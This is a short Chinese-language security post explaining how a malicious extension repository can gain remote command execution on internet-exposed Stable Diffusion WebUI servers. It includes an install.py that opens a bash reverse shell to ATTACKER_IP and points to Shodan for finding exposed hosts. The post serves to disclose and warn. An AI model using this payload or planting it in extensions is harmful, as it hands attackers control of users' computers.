**Stable Diffusion WebUI RCE Vulnerability**
目前最有名的Stable Diffusion GUI 程式是由AUTOMATIC1111开发的
stable-diffusion-webui,它强大且多功能的介面,吸引了非常多人的使用。
Stable Diffusion Web UI 支援透过Extension 功能安装第三方的套件,使用者仅需贴上对应的GitHub Repository 即可安装对应的套件。
透过这种方式安装套件非常方便,但也有严重的安全隐患。这些套件都是透过Python 撰写而成,因此,骇客也可以自行准备一个恶意的脚本,并透过该UI 载入,即可达成远端指令执行(RCE)。
Stable Diffusion Web UI 的套件格式为,一个install.py的脚本进行安装相关操作,而主要的脚本则放在scripts资料夹中。而初次引入脚本的瞬间,系统会自动执行install.py的程式码。因此,如果攻击者准备好一个包含恶意脚本的Repository,并引入,即可控制远端的系统。
举例来说,我们可以建立一个Github Repository,并单纯只放入install.py,里面写入一个Reverse Shell 的脚本。
```
import os
os.system("bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/8787 0>&1' &")
```
并操作Stable Diffusion Web UI 进行引入的动作,当按下引入后,攻击者的IP 即可收到一个Reverse Shell,也就代表我们已经顺利的骇入这台电脑或伺服器了!
Demo: https://www.youtube.com/watch?v=yyjeMs1R8Ew
其实,这套Web UI 预设是开在127.0.0.1 仅供本地使用,不过许多人为了远端存取,或是多人共用,因此将其直接开在广域网路上。可怕的事情是,只要对整个网际网路开启了Web UI,骇客就可以轻易地夺走使用者的电脑或是伺服器!
透过Shodan 或是Fofa 等搜寻引擎更可以发现,数以千计的伺服器正开启着这样的服务对外,影响层面可能比想像中还要大。
暂无评论